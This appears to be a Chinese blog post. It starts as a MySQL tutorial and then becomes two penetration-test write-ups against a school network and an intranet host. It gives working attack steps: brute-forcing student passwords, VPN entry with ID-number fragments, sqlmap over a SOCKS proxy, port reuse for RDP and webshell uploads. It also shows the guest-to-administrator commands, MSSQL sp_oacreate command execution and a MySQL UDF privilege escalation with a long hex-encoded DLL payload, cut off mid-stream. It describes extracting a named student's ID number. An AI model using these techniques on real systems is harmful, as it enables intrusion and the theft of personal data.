运维知识点-MySQL从小白到入土

在这里插入图片描述

数据库基本概念

数据库类型和常见的关系型数据库

MySQL介绍

MySQL的安装

查看MySQL的安装结果

MySQL登录,访问,退出操作

数据库的卸载

使用图形客户端Navicat连接MySQL

SQL语言入门

创建数据库表

数据库表列类型

添加数据

修改,删除数据

修改,删除数据库表

非外键约束

外键约束

外键策略

函数的分类

单行函数

多行函数

分组group by

having分组后筛选

单表查询总结

多表查询语法

多表查询语法

单行子查询

事务及其特征

事务隔离级别

事务并发问题

存储过程

获取 备注信息

获取表rider_users中字段id的备注信息:

sql
SELECT COLUMN_COMMENT 
FROM INFORMATION_SCHEMA.COLUMNS 
WHERE TABLE_NAME = 'rider_users' 
AND COLUMN_NAME = 'id';

修改已存在的表的结构 ALTER TABLE

增加列 ADD COLUMN

ALTER TABLE xxxxADD COLUMNsource_id int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT '来源记录id' AFTERuser_id;
在 xxxx 表中新增了一个名为source_id 的列。该列的数据类型是 int(11) 无符号整数,不允许为空,且默认值为0。
该列还带有一个注释说明 ‘来源记录id’。
这个新列被添加在 user_id 列之后。

修改列 MODIFY COLUMN

ALTER TABLE xxxx
MODIFY COLUMN source tinyint(3) UNSIGNED NOT NULL DEFAULT 10 COMMENT ‘来源’ AFTER is_comment;
修改了 xxxx 表中名为 source 的列的定义。对该列进行了修改,将其数据类型更改为 tinyint(3) 无符号整数,不允许为空,且默认值为10。
该列还带有一个注释说明 ‘来源’。
这个修改操作将该列移动到 is_comment 列之后。

外键约束检查 FOREIGN_KEY_CHECKS

SET FOREIGN_KEY_CHECKS=0;

在默认情况下,MySQL 数据库会启用外键约束检查,即在进行数据插入、更新或删除操作时,会检查该操作是否违反了表之间的外键约束关系。如果检测到违反了外键约束,则会抛出错误并取消操作。

内网渗透实战-代理sql注入-vpn-端口复用rdp

  • 内网资产嗅探
    通过谷歌语法搜索该学校的学号
    通过收集的学号,可以生成学号字典去爆破弱口令用户
    获得了该校的学号格式
    在这里插入图片描述
    以下获取到
    默认的密码为
    身份证号的某段

如何获取学号对应的身份证号码。
在这里插入图片描述
弱口令爆破

通过上述获取到的学号生成字典,找到一处无验证码的学生系统进行爆破。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
如上成功爆破出尾数50的学号存在弱口令,
通过弱口令可以登录该系统,
登录后可以获取到该学生的身份证号码。

此时,我们掌握了一个学号、姓名及身份证号,如果时间足够可以多去爆破几个。

通过对该学校网站继续浏览,发现网站存在VPN系统,此处为突破口。

内网资产嗅探

通过上述获取到的学号+身份证后6位成功登录VPN系统,
若登录不成功,则可以多爆破几个学号,

尝试通过他们的身份证号进行登录,总有学生没有改默认密码的。

在这里插入图片描述
在这里插入图片描述
如上成功登录VPN系统,进入学校内网。
通过对内网的资产进行了大概的浏览及信息收集,发现存在以下IP段:

192.168.25x.0

192.168.4.0

192.168.5.0

扫描该网段开放WEB服务的服务器,
同时后台扫描SQLServer及MySQL的弱口令。
如下,内网还是存在很多的网站服务器。

在这里插入图片描述
通过对几个网段的Web系统的逐个浏览测试,发现主要存在以下漏洞
在线考试管理系统存在SQL注入
在这里插入图片描述
抓包使用Sqlmap进行测试,一片红证明存在安全防护软件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
资产管理系统存在SQL注入---->用户名处加单引号报错
在这里插入图片描述
在这里插入图片描述

抓包使用Sqlmap进行测试
在这里插入图片描述
在这里插入图片描述
同样抓包使用Sqlmap进行测试,但此处未被拦截。

分析后发现该站点和上面站点不是一个网段,
考试管理系统的是192.168.25x.0网段,而当前系统是192.168.4.0网段,
可能是WAF的部署位置缺陷导致
未防护到192.168.4.0网段。推测其大概网络拓扑图如下:

在这里插入图片描述
然当前注入点为SA权限,但不支持os-shell
也未找到后台管理页面,且该系统很大可能不存在我们需要的信息。此处暂且先放一边

后台弱口令

发现一系统后台弱口令,成功登录后,并未有可以利用的功能点,且该站点有WAF进行防护。

在这里插入图片描述
服务扫描那一块已经扫描完成,扫到存在sa弱口令的服务
SA弱口令

如下,发现两台存在弱口令的服务器,
且为192.168.25x.0网段。可以通过获取该服务器权限建立代理,
然后去跑同网段考试系统的注入点,
即可绕过WAF的防护,进而可获取数据库的信息

在这里插入图片描述
通过SQL工具连接后可以执行cmd,且当前权限为system权限
在这里插入图片描述
通过以下命令查找RDP服务的端口号

tasklist/svc | find “TermService”

netstat-nao | find “3220”

发现当前RDP服务的端口号为8080
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
直接远程内网IP:8080,
提示访问拒绝,表示VPN并未对外开放8080端口的访问。
本想通过reGeorg脚本建立代理,但是80端口访问为报错,
测试默认网站路径写入文件也404。
测试本服务器为纯内网环境,不可访问互联网。

端口复用及Socks代理

通过对当前环境的分析,
目前已经获取了25x的服务器的system权限cmd,
想通过这台服务器建立代理,及登录服务器,在服务器上进行同网段的扫描探测,以此来绕过安全设备的防护。

1、端口复用

但当前是通过VPN连接到内网,
且VPN仅对外开放了某些特定端口。
此时我首先想到的是利用端口复用,
正好当前的80端口的网站为报错页面,于是上传了利用工具。
在这里插入图片描述在目标服务器上执行以下两条命令,此时相当于把本地的8080端口映射到80端口上。

c:\wmpub\drivers.exe

c:\wmpub\Changeport.exelocalhost 8080

执行上述两条命令后,在本地nc目标IP80

发送chkroot2007

即开启端口复用,80端口的web服务会无法访问。

在这里插入图片描述
此时远程目标IP:80端口,即可访问服务器RDP
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功登录该服务器,通过该服务器即可当跳板登录内网更多的服务器,且可以对内网进行扫描

在这里插入图片描述
测试过程中发现端口复用并不稳定,不时就会断开,有可能是安全设备防护的原因
对目标IP进行了全端口扫描,看看开放了哪些端口,扫描后发现被封了访问20多分钟。
待解封后对端口逐个访问测试,发现存在9527存在web服务。
在这里插入图片描述
在这里插入图片描述
此时需要找网站的物理路径写shell,以下两种方式即可:
dirf:\2013103011494215.jpg /s

typeC:\WINDOWS\system32\inetsrv\MetaBase.xml | findstr “Path”

在这里插入图片描述
找到路径后写入菜刀一句话shell

在这里插入图片描述
连接被重置证明存在安全设备,直接上传reGeorg代理脚本访问也是连接被重置。
此处用到神器冰蝎,上传后成功连接。在这里插入图片描述

在这里插入图片描述
开始Socks代理

开启Socks代理,sqlmap挂上代理进行考试系统注入测试

在这里插入图片描述
sqlmap.py–proxy=socks5://192.168.0.110:10086

在这里插入图片描述
如上没有报一片红,当前注入点权限为root,绕过了安全设备的防护
在这里插入图片描述
学生信息获取
通过对数据库的浏览,发现存在member表,
且数量为近5w,可以估计此约为全校学生信息,包含学号,姓名,身份证号等。

在这里插入图片描述
通过以下SQL语句即可获取刘书源的信息:

selectusername,name,idcard from user_data where name=‘刘书源’;

在这里插入图片描述
即可获取刘书源的学号及身份证号码,通过身份证号码后六位即可登录大部分系统。
在这里插入图片描述
在这里插入图片描述
达成此次测试的目的,成功获取刘书源的相关信息。

通过爆破教师弱口令,登录门户系统进行测试。在这里插入图片描述在这里插入图片描述OA系统
在这里插入图片描述

教学平台
在这里插入图片描述
科研系统
在这里插入图片描述
财务系统
在这里插入图片描述
资产管理系统

在这里插入图片描述
抓取已经获取服务器的账号密码,收集服务器的数据库相关信息等继续进行横向渗透测试

渗透实战-guest账户-mimikatz-向日葵-sql提权-离线解密

本文涉及技术点:
1.绕过火绒激活guest账户
2.国内外杀软区别(国外拦截敏感操作较少,例如下载、加账号等)
3.mimikatz哈希登录
4.流量检测下的绕过(cs的http监听可替换为https)
5.向日葵利用
6.mysql和sqlserer的提权
7.administrator权限下的reg转储和离线解密

0x00 外网web打点入口点

若依管理系统。
部分版本的若依系统存在shiro rce。
弱口令。

通过RCE命令执行

上线 内存马注入到可访问的静态资源中上线webshell
在这里插入图片描述

0x01 内网渗透 信息收集

arp表
netstat
进程查看
敏感web文件


主机ip:192.168.1.201
权限:administrator
杀软:小红伞、火绒
开放端口:338933061433
存在向日葵

0x02 后渗透

 上线cs:
理由
小红伞动态流量查杀比较强,火绒的静态查杀能力比较强。

使用https的马成功能上线
小红伞的流量检测,https的监听加密可能无法被小红伞准确识别,可以上线cs


● 恶意的操作还是会被杀(包括frp代理的流量)

开启的端口为数据库端口,这里就去翻了web主机文件,
获取到sqlserver和mysql的账号密码:

在这里插入图片描述
● 使用ladon、fscan等探测均会被杀
● 所以这里既然开了3389且杀软为小红伞、火绒。

采用了激活guest账户的方法(小红伞不拦截、火绒可绕过)
激活后加入管理员组直接上线了远程桌面

net user guest /active:yes
net user guest Admin!@#456
net localgroup administors guest /add

在这里插入图片描述
上线远程桌面后,把马加入白名单这样就上线了cs
可以进行一些敏感操作

1.administrator权限可以reg转储sam密码离线解密(可以使用mimikatz哈希登录)
2.利用向日葵远程登录
3.使用加入白名单的马进程的cs进行简单的端口扫描

获取到了内网的几台数据库并且都利用相同的口令或者弱口令连接上数据库
在这里插入图片描述
在这里插入图片描述

MSSQL利用

提权思路

以spoacreate进行分析:

 declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'

执行上面的命令,若出现报错提示未开启sp可以使用下面的命令进行开启:

 EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'show advanced options', 0;

spoacreate无回显,这里可以采用多种的方法进行尝试,
利用系统变量的函数能带出的信息有很少

在这里插入图片描述
● 把回显命令的内容写在txt中,把创建的txt放在web根路径下,然后通过web访问txt读取命令回显的内容

----- 前提就是需要有web并且知道web路径

● 如果有弱口令,可以尝试sharpsql连接查看命令回显txt或者看看是否可以直接带回显:
在这里插入图片描述

sharpsql的spoacreate成功回显,利用sharpsql还可以操作一些文件,或者上线cs马等一些操作。
利用xpcmdshell也可以直接执行命令。

MYSQL利用

进行udf提权
查看当前的文件导入导出权限
由于dbever的粘贴内容长度有限制,所以这里使用navicat连接进行提权

 show global variables like 'secure%';

当前的值为空,代表当前权限下可以导入导出文件到任意文件目录

在这里插入图片描述
查看本架构和plugin信息(发现存在默认的plugin路径):

 show variables like '%compile%';             #查看主机版本及架构
show variables like 'plugin%';               #查看 plugin 目录

在这里插入图片描述
确定这个udf提权可用,使用写入文件流的方式写入udf.dll的编码数据

● 注意文件的路径需要\进行转义,且udf.dll文件名字不能改(这个也是直接上线到了system权限)

 create table udftmp1 (c blob)
insert into udftmp1 values(convert(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000007148657F35290B2C35290B2C35290B2C35290B2C3F290B2CF626562C31290B2C4E35072C34290B2C5A36012C31290B2CB635052C36290B2C5A360F2C31290B2C5A36002C34290B2C5736182C3E290B2C35290A2C56290B2CF6266B2C38290B2CF626572C34290B2CF626512C34290B2C5269636835290B2C00000000000000000000000000000000504500004C010400BFC7514B0000000000000000E0000E210B01070A00220000001C0000000000002D300000001000000040000000000010001000000002000004000000000000000400000000000000008000000004000000000000020000000000100000100000000010000010000000000000100000002052000070000000A44A0000B40000000000000000000000000000000000000000000000000000000070000064020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000004C0100000000000000000000000000000000000000000000000000002E746578740000000C210000001000000022000000040000000000000000000000000000200000602E7264617461000090120000004000000014000000260000000000000000000000000000400000402E64617461000000500000000060000000020000003A0000000000000000000000000000400000C02E72656C6F630000080400000070000000060000003C00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000558BEC83EC14578D45FC506A28FF156040001050FF151C4000108B450CF7D81BC083E0028945F88D45F050FF7508C745EC010000006A00FF15204000106A006A006A108D45EC506A00FF75FCFF15244000108BF885FF7500FF75FCFF15A44000108BC75FC9C3558BEC81EC8004000053568B35804000105733DB538D45D4508D45EC5033FF8D45F44750885DFF885DFEC745D40C000000895DD8897DDCFFD685C00F84F3000000538D45D4508D45E4508D45F050FFD685C00F84DC0000008D458050FF15844000108B45F08945B88B45EC8945C08945BC8D45C4508D458050535353575353FF750CC745AC010100005366895DB0FF158840001085C00F84980000008B3534400010C645FF01FFD68B3D8C4000108945E8EB67395DF87642B8000400003945F872038945F8538D45E050FF75F88D8580FBFFFF50FF75F4FF159040001085C07453FF75E08B4D088B018D9580FBFFFF52FF5004FFD68945E8EB1853FF75C4FF159440001085C0742CFFD62B45E83B4510731E6A07FF159C400010538D45F850535353FF75F4895DF8FFD785C07585EB04C645FE01FF15A0400010385DFF8B35A44000108BF8741E385DFE740F395D14740A53FF75C4FF15A8400010FF75C8FFD6FF75C4FFD6395DF07405FF75F0FFD6395DEC7405FF75ECFFD6395DE47405FF75E4FFD6395DF47405FF75F4FFD657FF15B04000105F5E33C05BC9C3837C24040274138B44240C8B08686041001050FF51085959EB48568B74240C57566A02E8A2010000050004000050FF1508410010FF76048BF8685041001057FF15044100106A0168E02E000057FF742438E80FFEFFFF57FF150041001083C42C5F5E33C0C3837C24040274138B44240C8B08687C41001050FF51085959EB1A8B4424086A0068D0070000FF7004FF742418E8CFFDFFFF83C41033C0C38BC18B4C24048948088B4C240889480C8A4C240CC70098410010884804C7401002000000C20C00C70198410010C3F644240401568BF1C70698410010740756E8021C0000598BC65EC20400565733FF8BF147397E087E52807E04008B460C8B04B88A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C05959740D473B7E087CAE32C05F5EC20400B001EBF756578BF1836614006A025F397E087E62807E04008B460C8B44B8FC8A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C059597408473B7E087CADEB0D8B460C8B04B847894614897E108B46145F5EC20400565733FF33F6397C240C7E188B442410FF34B8E8111B0000473B7C2410598D7406017CE85F8BC65EC333C0390510600010740D5050A310600010FF15444100108B0D24600010E89A0E00008B4C240489410C32C0C38B442404FF700C8B0D24600010E875180000C3558BEC518B0D246000108365FC00568B7514568D45FC508B450CFF7008FF308B4508FF700CE80F190000833EFF7516837DFC00740DFF75FCE8841A0000598906EB038326008B45FC8B551885C00F94C1880A5EC9C3837C240801752B8B4424046A2CA320600010E85B1A000085C05974098BC8E879180000EB0233C085C0A324600010752AEB2B837C24080075218B0D2460001085C97417568BF1E8BE17000056E80A1A000083252460001000595E33C040C20C00558BEC83EC1453578D45F8506A08FF750833DB895DF8895DF4FF151C4000108BF83BFB7467568B35144000108D45FC5053536A01FF75F8895DFCFFD6395DFC8BF87648FF75FCE8C7190000598D4DFC51FF75FC8945F4506A01FF75F8FFD68BF83BFB74278D45EC508D45F050FF750C8D451450FF75108B45F4C745F004010000FF3053FF15184000108BF85E395DF87409FF75F8FF15A4400010395DF47409FF75F4E854190000598BC75F5BC9C38B4424048B0868A041001050FF51085959C3558BECB838250000E85B1900006683A5D4FDFFFF006683A5D8FEFFFF005356576A4033C0598DBDD6FDFFFFF3AB66AB6A4033C0598DBDDAFEFFFFF3AB33DB43395D0C66AB8BC3C645FD00C645FA00C645FF00C645FE00C645FB00C645FC008945F40F86B30000008B75108B3DFC400010C1E0028B0C3080392D75710FBE510183EA6B743A4A74314A7562837D0C030F8C900000008A490280F970C645FA01741280F97375478B443004C645FE018945DCEB3AC645FF01EB1DC645FD01EB2E837D0C037C670FBE490283E96E74144949751BC645FB01FF743004FFD7598945ECEB0B8B443004C645FC018945E08B45F4403B450C8945F40F8274FFFFFF807DFD007530807DFF00752A807DFE007524807DFB00751E807DFC007518FF7508E8CCFEFFFFEB4368CC420010EB3268B0420010EB2B53689C420010E81BF9FFFF59598D45E45068001000008D85C8DAFFFF50E8E619000085C0751768804200108B45088B0850FF510859598BC3E9B30200008365F400F745E4FCFFFFFF0F86A00200008D9DC8DAFFFFBE04010000FF338B3D384000106A006810040000FFD785C089450C0F84640200008365E80068001000008D85C8EAFFFF6A0050E89A170000568D85D4FDFFFF6A0050E88B170000568D85D8FEFFFF6A0050E87C170000568D85D0FCFFFF6A0050E86D170000568D85CCFBFFFF6A0050E85E170000568D85D4FDFFFF508D85D8FEFFFF50FF750CE82FFDFFFF83C44C8D45E85068001000008D85C8EAFFFF50FF750CE80819000085C0742C568D85D0FCFFFF50FFB5C8EAFFFFFF750CE8E8180000568D85CCFBFFFF50FFB5C8EAFFFFFF750CE8CC180000807DFB0074078B45EC3903741C807DFC007463FF75E08D85CCFBFFFF50FF15CC40001085C05959754DFF750CFF15A4400010FF336A006A01FFD785C08B7D0889450C74358B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4186A00FF750CFF15A8400010EB038B7D08807DFD0074258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C418807DFF0074148B45EC3B03750D8B07685442001057FF50085959807DFA000F84DE0000008365F000F745E8FCFFFFFF0F86CD000000807DFF0074568B45EC3B030F85BC000000568D85C8FAFFFF6A0050E8031600008B7DF083C40C568D85C8FAFFFF508DBCBDC8EAFFFFFF37FF750CE8BA170000FF378B45088B088D95C8FAFFFF52684442001050FF51088B7D0883C410807DFE007459568D85CCFBFFFF508B45F0FFB485C8EAFFFFFF750CE87717000085C0743BFF75DC8D85CCFBFFFF50FF15EC40001085C0595974258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4188B45E8FF45F0C1E8023945F00F8233FFFFFFFF750CFF15A44000108B45E4FF45F4C1E80283C3043945F40F826BFDFFFF33C05F5E5BC9C3558BEC51568D45FC50681900020033F656FF750CFF7508FF150840001085C075278D451850FF75145656FF7510FF75FCFF150C40001085C07403897518FF75FCFF1510400010EB038975188B45185EC9C3558BEC5151538B5D10578D45FC50FF750C33FF397D20FF7508897DF87508FF1528400010EB2FFF152C40001085C0757957578D4514505753FF75FCFF150C40001085C07564837D2002750E53FF75FCFF150040001085C07550837D1401568B35044000107406837D1402751CFF7518E860140000594050FF7518FF75145753FF75FCFFD685C07520837D140475136A048D451C506A045753FF75FCFFD685C07507C745F8010000005EFF75FCFF15104000108B45F85F5BC9C3558BEC51576810430010FF15404000108BF885FF744A53568B353C40001068FC42001057FFD68BD885DB743268E842001057FFD68BF085F674248D45FC506A016A016A13FFD63D7C0000C0750C8D45FC506A006A016A13FFD6FF7508FFD35E5B5FC9C3566A016870430010E8B7F4FFFF8B7424108B06685843001056FF50088B44241C33C983C4103BC175135151FF152C41001085C075566844430010EB3083F8017514516A06FF152C41001085C0753D6830430010EB1783F802751B516A0CFF152C41001085C07524681C4300108B0656FF500859EB1583F80375046A01EB0783F80475086A02E813FFFFFF5933C0405EC3558BEC837D0C027C288B45108B400480382D751D4050FF15FC40001085C0597C1083F8047F0B50FF7508E841FFFFFFEB0E8B45088B08688843001050FF5108595933C05DC3A13060001085C0752168504400106844440010FF154040001050FF153C40001085C0A330600010750
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

amingMM

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值